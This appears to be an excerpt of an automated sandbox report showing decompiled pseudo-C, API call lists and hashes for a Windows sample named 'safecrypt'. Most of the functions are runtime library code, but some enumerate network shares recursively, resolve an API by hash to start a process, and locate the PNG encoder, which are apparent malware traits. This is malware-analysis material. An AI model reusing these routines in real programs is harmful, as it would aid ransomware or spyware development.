                    				void* _t34;
                    				intOrPtr _t36;
                    				intOrPtr _t39;
                    				intOrPtr* _t41;
                    				intOrPtr _t42;
                    				signed int _t43;
                    
                    				_t16 =  &_v12;
                    				_v8 = 0;
                    				_v12 = 0;
                    				__imp__GdipGetImageEncodersSize( &_v8, _t16);
                    				_t42 = _v12;
                    				if(_t42 != 0) {
                    					_t17 = E004258F2(_t34, 0, _t42, _t42);
                    					_t27 = _t17;
                    					if(_t27 == 0) {
                    						L15:
                    						return _t17 | 0xffffffff;
                    					} else {
                    						__imp__GdipGetImageEncoders(_v8, _t42, _t27);
                    						_t43 = 0;
                    						if(_v8 <= 0) {
                    							L14:
                    							_t17 = E004258B8(_t27);
                    							goto L15;
                    						} else {
                    							_t8 = _t27 + 0x30; // 0x30
                    							_t41 = _t8;
                    							do {
                    								_t19 =  *_t41;
                    								_t31 = L"image/png";
                    								while(1) {
                    									_t36 =  *_t19;
                    									if(_t36 !=  *_t31) {
                    										break;
                    									}
                    									if(_t36 == 0) {
                    										L10:
                    										_t19 = 0;
                    									} else {
                    										_t39 =  *((intOrPtr*)(_t19 + 2));
                    										if(_t39 != _t31[2]) {
                    											break;
                    										} else {
                    											_t19 = _t19 + 4;
                    											_t31 =  &(_t31[4]);
                    											if(_t39 != 0) {
                    												continue;
                    											} else {
                    												goto L10;
                    											}
                    										}
                    									}
                    									L12:
                    									if(_t19 == 0) {
                    										_t21 = _t43 * 0x4c;
                    										_t22 = _t21 + _t27;
                    										 *0x43f9e0 =  *((intOrPtr*)(_t21 + _t27));
                    										 *0x43f9e4 =  *((intOrPtr*)(_t22 + 4));
                    										 *0x43f9e8 =  *((intOrPtr*)(_t22 + 8));
                    										 *0x43f9ec =  *((intOrPtr*)(_t22 + 0xc));
                    										E004258B8(_t27);
                    										return _t43;
                    									} else {
                    										goto L13;
                    									}
                    									goto L17;
                    								}
                    								asm("sbb eax, eax");
                    								asm("sbb eax, 0xffffffff");
                    								goto L12;
                    								L13:
                    								_t43 = _t43 + 1;
                    								_t41 = _t41 + 0x4c;
                    							} while (_t43 < _v8);
                    							goto L14;
                    						}
                    					}
                    				} else {
                    					return _t16 | 0xffffffff;
                    				}
                    				L17:
                    			}

                    APIs
                    • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0041F308
                    • _malloc.LIBCMT ref: 0041F320
                    • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 0041F334
                    • _free.LIBCMT ref: 0041F389
                    Similarity
                    • API ID: EncodersGdipImage$Size_free_malloc
                    • String ID: image/png
                    • API String ID: 3010823376-2966254431
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E0041F1C0(intOrPtr _a4) {
                    				char _v12;
                    				void* _v24;
                    				void* _v28;
                    				short _v56;
                    				intOrPtr _v60;
                    				char _v104;
                    				intOrPtr* _t14;
                    				intOrPtr* _t17;
                    				intOrPtr* _t23;
                    
                    				_t14 =  *0x480454;
                    				_v12 = 0;
                    				if(_t14 != 0) {
                    					 *_t14( &_v12);
                    				}
                    				E0042C770( &_v104, 0, 0x44);
                    				_v56 = 0;
                    				_v60 = 1;
                    				_v104 = 0x44;
                    				_t17 = E00412FC0( &_v104, 0, 1, 0x46318ac7);
                    				 *_t17(0, _a4, 0, 0, 0, 0x20, 0, 0,  &_v104,  &_v28);
                    				WaitForSingleObject(_v28, 0x7530);
                    				CloseHandle(_v28);
                    				CloseHandle(_v24);
                    				Sleep(0x3e8);
                    				_t23 =  *0x480458;
                    				if(_t23 != 0) {
                    					return  *_t23(_v12);
                    				}
                    				return _t23;
                    			}

                    Similarity
                    • API ID: CloseHandle$ObjectSingleSleepWait_memset
                    • String ID: D
                    • API String ID: 388116002-2746444292
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E0042A7D8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                    				intOrPtr _t26;
                    				intOrPtr _t30;
                    				intOrPtr _t39;
                    				void* _t40;
                    
                    				_t31 = __ebx;
                    				_push(8);
                    				_push(0x43a1d0);
                    				E00428D80(__ebx, __edi, __esi);
                    				GetModuleHandleW(L"KERNEL32.DLL");
                    				_t39 =  *((intOrPtr*)(_t40 + 8));
                    				 *((intOrPtr*)(_t39 + 0x5c)) = 0x432228;
                    				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
                    				 *((intOrPtr*)(_t39 + 0x14)) = 1;
                    				 *((intOrPtr*)(_t39 + 0x70)) = 1;
                    				 *((char*)(_t39 + 0xc8)) = 0x43;
                    				 *((char*)(_t39 + 0x14b)) = 0x43;
                    				 *(_t39 + 0x68) = 0x43d420;
                    				E0042CD4F(__ebx, 1, 0xd);
                    				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                    				InterlockedIncrement( *(_t39 + 0x68));
                    				 *(_t40 - 4) = 0xfffffffe;
                    				E0042A87A();
                    				E0042CD4F(_t31, 1, 0xc);
                    				 *(_t40 - 4) = 1;
                    				_t26 =  *((intOrPtr*)(_t40 + 0xc));
                    				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
                    				if(_t26 == 0) {
                    					_t30 =  *0x43db88; // 0x43dab0
                    					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
                    				}
                    				E0042A41C( *((intOrPtr*)(_t39 + 0x6c)));
                    				 *(_t40 - 4) = 0xfffffffe;
                    				return E00428DC5(E0042A883());
                    			}

                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043A1D0,00000008,0042A8E0,00000000,00000000,?,?,00426D3A,004258DE), ref: 0042A7E9
                    • __lock.LIBCMT ref: 0042A81D
                      • Part of subcall function 0042CD4F: __mtinitlocknum.LIBCMT ref: 0042CD65
                      • Part of subcall function 0042CD4F: __amsg_exit.LIBCMT ref: 0042CD71
                      • Part of subcall function 0042CD4F: EnterCriticalSection.KERNEL32(00000000,00000000,?,0042A822,0000000D), ref: 0042CD79
                    • InterlockedIncrement.KERNEL32(?), ref: 0042A82A
                    • __lock.LIBCMT ref: 0042A83E
                    • ___addlocaleref.LIBCMT ref: 0042A85C
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                    • String ID: KERNEL32.DLL
                    • API String ID: 637971194-2576044830
                    • Opcode ID: 9f8d92b2cf44ebd66823749e1cd988a193dab4839456689aab6e393a28dd2ae3
                    • Instruction ID: 794cabc18b157595e31bd4cefddb00e42657d5536d71df65bbb6301475bdf1ad
                    • Opcode Fuzzy Hash: 9f8d92b2cf44ebd66823749e1cd988a193dab4839456689aab6e393a28dd2ae3
                    • Instruction Fuzzy Hash: 9A018071900700DFD720AF66E80974EFBE0AF14328F50995FE896572E0CBB8A645CB1A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E00413760(void* _a4) {
                    				int _v8;
                    				int _v12;
                    				void* _t20;
                    				signed int _t26;
                    				void* _t37;
                    				void* _t50;
                    				intOrPtr* _t53;
                    				void* _t54;
                    
                    				_v8 = 0x4000;
                    				_v12 = 0xffffffff;
                    				if(WNetOpenEnumW(2, 0, 0, _a4,  &_a4) == 0) {
                    					_t20 = GlobalAlloc(0x40, _v8);
                    					_t37 = _t20;
                    					if(_t37 != 0) {
                    						while(1) {
                    							E0042C770(_t37, 0, _v8);
                    							_t54 = _t54 + 0xc;
                    							if(WNetEnumResourceW(_a4,  &_v12, _t37,  &_v8) != 0) {
                    								break;
                    							}
                    							_t50 = 0;
                    							if(_v12 > 0) {
                    								_t11 = _t37 + 0x14; // 0x14
                    								_t53 = _t11;
                    								do {
                    									_t29 =  *0x440184;
                    									if( *0x440184 <= 0x40 &&  *((intOrPtr*)(_t53 - 0x14)) == 2 &&  *((intOrPtr*)(_t53 - 0x10)) == 1) {
                    										E00426210((_t29 << 0xb) + 0x440238, 0x400,  *_t53);
                    										_t54 = _t54 + 0xc;
                    										 *0x440184 =  *0x440184 + 1;
                    									}
                    									if(( *(_t53 - 8) & 0x00000002) == 2) {
                    										_t15 = _t53 - 0x14; // 0x0
                    										E00413760(_t15);
                    									}
                    									_t50 = _t50 + 1;
                    									_t53 = _t53 + 0x20;
                    								} while (_t50 < _v12);
                    							}
                    						}
                    						GlobalFree(_t37);
                    						_t26 = WNetCloseEnum(_a4);
                    						asm("sbb eax, eax");
                    						return  ~_t26 + 1;
                    					} else {
                    						return _t20;
                    					}
                    				} else {
                    					return 0;
                    				}
                    			}

                    APIs
                    • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00413782
                    • GlobalAlloc.KERNEL32(00000040,00004000), ref: 0041379B
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocEnumGlobalOpen
                    • String ID:
                    • API String ID: 3336353811-0
                    • Opcode ID: 27b2b559b776b6c4690c26b4bfb6e4de3451b635195df2fcc787fd503d34deee
                    • Instruction ID: 4f844c565858c7faa4bb316da5fbad27f8503c329a9b64fd63da8fcca27e1d66
                    • Opcode Fuzzy Hash: 27b2b559b776b6c4690c26b4bfb6e4de3451b635195df2fcc787fd503d34deee
                    • Instruction Fuzzy Hash: 8831D7F1600104EFEB20DF94DC85FEBB7B8EB54315F10856AFA0496280D7759E94C7A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E00429F5B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t15;
                    				LONG* _t21;
                    				void* _t31;
                    				LONG* _t33;
                    				void* _t34;
                    				void* _t35;
                    
                    				_t35 = __eflags;
                    				_t29 = __edx;
                    				_t25 = __ebx;
                    				_push(0xc);
                    				_push(0x43a170);
                    				E00428D80(__ebx, __edi, __esi);
                    				_t31 = E0042A905(__ebx, __edx, _t35);
                    				_t15 =  *0x43d940; // 0xfffffffe
                    				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                    					E0042CD4F(_t25, _t31, 0xd);
                    					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                    					_t33 =  *(_t31 + 0x68);
                    					 *(_t34 - 0x1c) = _t33;
                    					__eflags = _t33 -  *0x43d848; // 0x22d2b80
                    					if(__eflags != 0) {
                    						__eflags = _t33;
                    						if(__eflags != 0) {
                    							__eflags = InterlockedDecrement(_t33);
                    							if(__eflags == 0) {
                    								__eflags = _t33 - 0x43d420;
                    								if(__eflags != 0) {
                    									E004258B8(_t33);
                    								}
                    							}
                    						}
                    						_t21 =  *0x43d848; // 0x22d2b80
                    						 *(_t31 + 0x68) = _t21;
                    						_t33 =  *0x43d848; // 0x22d2b80
                    						 *(_t34 - 0x1c) = _t33;
                    						InterlockedIncrement(_t33);
                    					}
                    					 *(_t34 - 4) = 0xfffffffe;
                    					E00429FF6();
                    				} else {
                    					_t33 =  *(_t31 + 0x68);
                    				}
                    				_t38 = _t33;
                    				if(_t33 == 0) {
                    					_push(0x20);
                    					E0042888C(_t29, _t38);
                    				}
                    				return E00428DC5(_t33);
                    			}

                    APIs
                    • __getptd.LIBCMT ref: 00429F67
                      • Part of subcall function 0042A905: __getptd_noexit.LIBCMT ref: 0042A908
                      • Part of subcall function 0042A905: __amsg_exit.LIBCMT ref: 0042A915
                    • __amsg_exit.LIBCMT ref: 00429F87
                    • __lock.LIBCMT ref: 00429F97
                    • InterlockedDecrement.KERNEL32(?), ref: 00429FB4
                    • _free.LIBCMT ref: 00429FC7
                    • InterlockedIncrement.KERNEL32(022D2B80), ref: 00429FDF
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                    • String ID:
                    • API String ID: 3470314060-0
                    • Opcode ID: e021c20a60162d40ff9a88795f3e910094c4a24248f36599c9ec6f1cf86f1137
                    • Instruction ID: 720709536d1c510a689085673a408230c9cd76516c5df66acc641a0d1243c4c7
                    • Opcode Fuzzy Hash: e021c20a60162d40ff9a88795f3e910094c4a24248f36599c9ec6f1cf86f1137
                    • Instruction Fuzzy Hash: 3201AD32F01631ABDB60AF66B90574E73B0BF04724F96512BE814A7290CB3C6C41CB8D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E00403140(signed int __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                    				char _v8;
                    				signed int _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v36;
                    				signed int _v40;
                    				signed int _t71;
                    				void* _t72;
                    				signed int _t74;
                    				signed int _t82;
                    				signed int _t88;
                    				signed int _t93;
                    				signed int _t98;
                    				void* _t99;
                    				intOrPtr _t100;
                    				void* _t105;
                    				signed int _t121;
                    				signed int _t125;
                    				signed int _t133;
                    				intOrPtr _t134;
                    				void* _t135;
                    				intOrPtr _t136;
                    				signed int _t141;
                    				signed int _t142;
                    
                    				_t120 = __edx;
                    				_t71 = _a20;
                    				_t133 = _a24;
                    				_v40 = 0;
                    				_v8 = 2;
                    				if((_t71 | _t133) != 0) {
                    					_t72 = E0040D2C0(_t71, _t133);
                    					_t141 = _a8;
                    					_t98 = 0x40 - _t72;
                    					__eflags = _t141 - _t133;
                    					if(__eflags >= 0) {
                    						if(__eflags > 0) {
                    							L5:
                    							_t9 =  &_a4;
                    							 *_t9 = _a4 - _a20;
                    							__eflags =  *_t9;
                    							asm("sbb esi, edi");
                    							_a8 = _t141;
                    						} else {
                    							_t120 = _a4;
                    							__eflags = _t120 - _a20;
                    							if(_t120 >= _a20) {
                    								goto L5;
                    							}
                    						}
                    					}
                    					__eflags = _t98;
                    					if(_t98 != 0) {
                    						L00430280();
                    						_a24 = _t133;
                    						L0043027A();
                    						_v16 = _a16;
                    						L00430280();
                    						_t93 = _v16 | _t141;
                    						__eflags = _t93;
                    						_t120 = _a16;
                    						_a8 = _t93;
                    						_a4 = _a12 | _a4;
                    						L00430280();
                    						L8:
                    						_t141 = _a8;
                    						_t133 = _a24;
                    						_a16 = _t120;
                    					}
                    					__eflags = _t141 - _t133;
                    					if(_t141 != _t133) {
                    						L12:
                    						_t99 = 0;
                    						__eflags = 0;
                    						_t74 = E00429CD0(_a4, _t141, _t133, 0);
                    						_v20 = _t74;
                    						_v16 = _t120;
                    						_t142 = _t74;
                    					} else {
                    						_t99 = 0;
                    						__eflags = 0;
                    						if(0 != 0) {
                    							goto L12;
                    						} else {
                    							_t142 = _t141 | 0xffffffff;
                    							_v16 = 0;
                    						}
                    					}
                    					_t121 = _v16;
                    					_t134 = E00430240(_t142, _t121, _t133, _t99);
                    					_t100 = _t121;
                    					_v28 = E00430240(_t142, _v16, _a20, 0);
                    					_t105 = _a4 - _t134;
                    					_v24 = _t121;
                    					asm("sbb eax, ebx");
                    					__eflags = _a8;
                    					if(_a8 == 0) {
                    						while(1) {
                    							_t88 = _a16;
                    							__eflags = _v24 - _t105;
                    							if(__eflags < 0) {
                    								goto L18;
                    							}
                    							if(__eflags > 0) {
                    								L17:
                    								asm("adc dword [ebp-0xc], 0xffffffff");
                    								_t136 = _t134 - _a24;
                    								asm("sbb ebx, ecx");
                    								_v28 = _v28 - _a20;
                    								_v20 = _t142 + 0xffffffff;
                    								asm("sbb [ebp-0x14], ecx");
                    								_t105 = _a4 - _t136;
                    								_v36 = _t136;
                    								asm("sbb esi, ebx");
                    								__eflags = _a8;
                    								_t142 = _v20;
                    								_t134 = _v36;
                    								if(_a8 == 0) {
                    									continue;
                    								}
                    							} else {
                    								__eflags = _v28 - _t88;
                    								if(_v28 > _t88) {
                    									goto L17;
                    								}
                    							}
                    							goto L18;
                    						}
                    					}
                    					L18:
                    					_t135 = _t134 + _v24;
                    					asm("adc ebx, ecx");
                    					__eflags = _a16 - _v28;
                    					if(__eflags <= 0) {
                    						if(__eflags < 0) {
                    							L21:
                    							_t135 = _t135 + 1;
                    							asm("adc ebx, ecx");
                    						} else {
                    							__eflags = _a12;
                    							if(_a12 < 0) {
                    								goto L21;
                    							}
                    						}
                    					}
                    					_a12 = _a12;
                    					_t125 = _a16;
                    					asm("sbb edx, eax");
                    					_t82 = _a4;
                    					__eflags = _a8 - _t100;
                    					if(__eflags <= 0) {
                    						if(__eflags < 0) {
                    							L25:
                    							_t82 = _t82 + _a20;
                    							asm("adc ecx, [ebp+0x1c]");
                    							_t142 = _t142 + 0xffffffff;
                    							asm("adc dword [ebp-0xc], 0xffffffff");
                    						} else {
                    							__eflags = _t82 - _t135;
                    							if(_t82 < _t135) {
                    								goto L25;
                    							}
                    						}
                    					}
                    					_t62 =  &_v8;
                    					 *_t62 = _v8 - 1;
                    					__eflags =  *_t62;
                    					if( *_t62 != 0) {
                    						_v40 = _t142;
                    						_t120 = _a12;
                    						_a8 = _t82 - _t135;
                    						_a4 = _t125;
                    						_a12 = 0;
                    						goto L8;
                    					}
                    					__eflags = _v16 | _v40;
                    					return _t142;
                    				} else {
                    					return _t71 | 0xffffffff;
                    				}
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _allshl$_aullshr
                    • String ID:
                    • API String ID: 1546378113-0
                    • Opcode ID: f6b7edbd7186fa5256035f0bbdbf3914fc7760640948aeede850365889856448
                    • Instruction ID: 8885ea01ec3c5572c1f234b64ef950578517bb80382775cee76f00ab7d99983f
                    • Opcode Fuzzy Hash: f6b7edbd7186fa5256035f0bbdbf3914fc7760640948aeede850365889856448
                    • Instruction Fuzzy Hash: 75614F75A002199BCF04DE69C88149FBBB6BF88361F14867EE829A7380D7349E418BD4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E0042666F(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                    				void* _t7;
                    				long _t8;
                    				intOrPtr* _t9;
                    				intOrPtr* _t12;
                    				long _t27;
                    				long _t30;
                    
                    				if(_a4 != 0) {
                    					_push(__esi);
                    					_t30 = _a8;
                    					__eflags = _t30;
                    					if(_t30 != 0) {
                    						_push(__edi);
                    						while(1) {
                    							__eflags = _t30 - 0xffffffe0;
                    							if(_t30 > 0xffffffe0) {
                    								break;
                    							}
                    							__eflags = _t30;
                    							if(_t30 == 0) {
                    								_t30 = _t30 + 1;
                    								__eflags = _t30;
                    							}
                    							_t7 = HeapReAlloc( *0x43ea98, 0, _a4, _t30);
                    							_t27 = _t7;
                    							__eflags = _t27;
                    							if(_t27 != 0) {
                    								L17:
                    								_t8 = _t27;
                    							} else {
                    								__eflags =  *0x43f0fc - _t7;
                    								if(__eflags == 0) {
                    									_t9 = E00426D35(__eflags);
                    									 *_t9 = E00426CF3(GetLastError());
                    									goto L17;
                    								} else {
                    									__eflags = E00428AC7(_t7, _t30);
                    									if(__eflags == 0) {
                    										_t12 = E00426D35(__eflags);
                    										 *_t12 = E00426CF3(GetLastError());
                    										L12:
                    										_t8 = 0;
                    										__eflags = 0;
                    									} else {
                    										continue;
                    									}
                    								}
                    							}
                    							goto L14;
                    						}
                    						E00428AC7(_t6, _t30);
                    						 *((intOrPtr*)(E00426D35(__eflags))) = 0xc;
                    						goto L12;
                    					} else {
                    						E004258B8(_a4);
                    						_t8 = 0;
                    					}
                    					L14:
                    					return _t8;
                    				} else {
                    					return E004258F2(__edx, __edi, __esi, _a8);
                    				}
                    			}

                    APIs
                    • _malloc.LIBCMT ref: 0042667D
                      • Part of subcall function 004258F2: __FF_MSGBANNER.LIBCMT ref: 0042590B
                      • Part of subcall function 004258F2: __NMSG_WRITE.LIBCMT ref: 00425912
                      • Part of subcall function 004258F2: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0042C81E,00000000,00000001,00000000,?,0042CCDA,00000018,0043A2C8,0000000C,0042CD6A), ref: 00425937
                    • _free.LIBCMT ref: 00426690
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap_free_malloc
                    • String ID:
                    • API String ID: 1020059152-0
                    • Opcode ID: de2577a03ee5e8e19d6adbe9e1fa5057656cfa3fda24e545a2d493b291012908
                    • Instruction ID: 2e3f7985fa8f610552a50c249afd44bd4e663d28a17fcfda2a4d696c366f830e
                    • Opcode Fuzzy Hash: de2577a03ee5e8e19d6adbe9e1fa5057656cfa3fda24e545a2d493b291012908
                    • Instruction Fuzzy Hash: CF11CB3270163566CB213F7ABC05A5E3694AF44364FA6443FF85986251DE3CC851869C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E0042A6DC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t12;
                    				void* _t28;
                    				intOrPtr _t29;
                    				void* _t30;
                    				void* _t31;
                    
                    				_t31 = __eflags;
                    				_t26 = __edi;
                    				_t25 = __edx;
                    				_t20 = __ebx;
                    				_push(0xc);
                    				_push(0x43a1b0);
                    				E00428D80(__ebx, __edi, __esi);
                    				_t28 = E0042A905(__ebx, __edx, _t31);
                    				_t12 =  *0x43d940; // 0xfffffffe
                    				if(( *(_t28 + 0x70) & _t12) == 0) {
                    					L6:
                    					E0042CD4F(_t20, _t26, 0xc);
                    					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                    					_t29 = _t28 + 0x6c;
                    					 *((intOrPtr*)(_t30 - 0x1c)) = E0042A68F(_t29,  *0x43db88);
                    					 *(_t30 - 4) = 0xfffffffe;
                    					E0042A749();
                    				} else {
                    					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                    					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                    						goto L6;
                    					} else {
                    						_t29 =  *((intOrPtr*)(E0042A905(_t20, __edx, _t33) + 0x6c));
                    					}
                    				}
                    				_t34 = _t29;
                    				if(_t29 == 0) {
                    					_push(0x20);
                    					E0042888C(_t25, _t34);
                    				}
                    				return E00428DC5(_t29);
                    			}


                    APIs
                    • __getptd.LIBCMT ref: 0042A6E8
                      • Part of subcall function 0042A905: __getptd_noexit.LIBCMT ref: 0042A908
                      • Part of subcall function 0042A905: __amsg_exit.LIBCMT ref: 0042A915
                    • __getptd.LIBCMT ref: 0042A6FF
                    • __amsg_exit.LIBCMT ref: 0042A70D
                    • __lock.LIBCMT ref: 0042A71D
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0042A731
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                    • String ID:
                    • API String ID: 938513278-0
                    • Opcode ID: f2fbc420132d43194b25b7664847a4a3129b6147077e52b926ff3ca479f20944
                    • Instruction ID: 7b311f60bf9219c79d71d473f93f387e982dc467ed98d4c56549f80763a8f37f
                    • Opcode Fuzzy Hash: f2fbc420132d43194b25b7664847a4a3129b6147077e52b926ff3ca479f20944
                    • Instruction Fuzzy Hash: D5F09631B017349BD720BB6AB80670E33B06F40728F96421FF940572D2CF2C9960865F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E0040F120(intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                    				signed int _v8;
                    				signed int _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t161;
                    				signed int _t162;
                    				signed int _t172;
                    				signed int _t177;
                    				void* _t181;
                    				intOrPtr _t182;
                    				signed int _t185;
                    				signed int _t186;
                    				signed int _t187;
                    				intOrPtr _t237;
                    				intOrPtr _t238;
                    				signed int _t241;
                    				signed int _t248;
                    				intOrPtr _t251;
                    				intOrPtr _t253;
                    				signed int* _t257;
                    				signed int _t290;
                    				intOrPtr _t293;
                    				intOrPtr _t296;
                    				intOrPtr _t297;
                    				signed int _t300;
                    				signed int _t301;
                    				intOrPtr _t332;
                    				void* _t334;
                    				signed int _t335;
                    				signed int _t336;
                    				signed int _t339;
                    				intOrPtr _t344;
                    				void* _t347;
                    				signed int _t350;
                    				void* _t354;
                    				void* _t355;
                    				void* _t356;
                    
                    				_t241 = _a16;
                    				_t355 = _t354 - 0x20;
                    				if(_t241 >= 8) {
                    					_t332 = _a24;
                    					_t344 = _a20;
                    					_v12 = _a8 + _t241 * 8;
                    					_v8 = _a12 + _t241 * 8;
                    					_v32 = 0;
                    					_v28 = _t241 - _t344;
                    					_v24 = _t332 - _t241;
                    					_v36 = E0040DCB0(_t241 - _t344, _t344, _a8, _v12) + _t158 * 2;
                    					_t161 = E0040DCB0(_t332 - _t241, _t332, _v8, _a12);
                    					_t237 = _a28;
                    					_t30 = _t161 + 4; // 0x40f7f5
                    					_t162 = _v36 + _t30;
                    					_t356 = _t355 + 0x10;
                    					__eflags = _t162 - 8;
                    					if(_t162 <= 8) {
                    						switch( *((intOrPtr*)(_t162 * 4 +  &M0040F550))) {
                    							case 0:
                    								E0040EA50(_v12, _t237, _a8, _t344, _t344 - _a16);
                    								_t228 = _a16;
                    								_t367 = _t356 + 0xc;
                    								_push(_t228 - _t332);
                    								_push(_t332);
                    								_t282 = _t237 + _t228 * 8;
                    								_t229 = _a12;
                    								_push(_v8);
                    								goto L8;
                    							case 1:
                    								__ecx = _a8;
                    								__esi = __esi - _a16;
                    								__eax = _v12;
                    								__ecx = __ebx;
                    								__eax = E0040EA50(_v12, __ebx, _a8, __esi, __esi - _a16);
                    								__edx = _v24;
                    								__eax = _a12;
                    								__ecx = _a16;
                    								__eax = _v8;
                    								__ecx = __ebx + _a16 * 8;
                    								__eax = E0040EA50(_v8, __ecx, _a12, __edi, _v24);
                    								_v32 = 1;
                    								goto L9;
                    							case 2:
                    								__edx = _v28;
                    								__eax = _v12;
                    								__eax = _a8;
                    								__ecx = __ebx;
                    								__eax = E0040EA50(_a8, __ebx, _v12, __esi, _v28);
                    								__eax = _a16;
                    								__edx = _v8;
                    								__ecx = __ebx + (_a12 - __edi) * 8;
                    								__eax = _a12;
                    								__eax = E0040EA50(_a12, __ecx, _v8, __edi, _a12 - __edi);
                    								_v32 = 1;
                    								goto L9;
                    							case 3:
                    								__eax = _v28;
                    								__ecx = _v12;
                    								__eax = _a8;
                    								__ecx = __ebx;
                    								__eax = E0040EA50(_a8, __ebx, _v12, __esi, _v28);
                    								__edx = _v24;
                    								__eax = _a12;
                    								__ecx = _a16;
                    								_push(_v24);
                    								_push(__edi);
                    								_push(_a12);
                    								__eax = _v8;
                    								__ecx = __ebx + _a16 * 8;
                    								L8:
                    								E0040EA50(_t229, _t282);
                    								L9:
                    								_t356 = _t367 + 0xc;
                    								goto L10;
                    						}
                    					}
                    					L10:
                    					_t248 = _a16;
                    					__eflags = _t248 - 8;
                    					if(__eflags != 0) {
                    						_t290 = _t248 + _t248;
                    						_v20 = (_t290 << 4) + _t237;
                    						_t293 = _t290 + _t290 + _t290 + _t290 + _t290 + _t290 + _t290 + _t290;
                    						_v24 = _t293;
                    						_v28 = _t293 + _t237;
                    						E0040ECE0(_t293 + _t237, _t293 + _t237, _t237, _t237 + _t248 * 8, _t248, 0, 0, (_t290 << 4) + _t237);
                    						_t296 = _a4;
                    						E0040ECE0(_t296, _t296, _a8, _a12, _a16, 0, 0, _v20);
                    						asm("cdq");
                    						_t172 = _a16 - _t296 >> 1;
                    						_v36 = _t172;
                    						_t251 = _t344;
                    						__eflags = _t344 - _t332;
                    						if(_t344 <= _t332) {
                    							_t251 = _t332;
                    						}
                    						__eflags = _t251 - _t172;
                    						_t253 = _v24;
                    						if(__eflags != 0) {
                    							if(__eflags <= 0) {
                    								_t297 = _a4;
                    								_v16 = _t253 + _t297;
                    								E0042C770(_t253 + _t297, 0, _t253);
                    								__eflags = _t344 - 0x10;
                    								if(_t344 >= 0x10) {
                    									L21:
                    									asm("cdq");
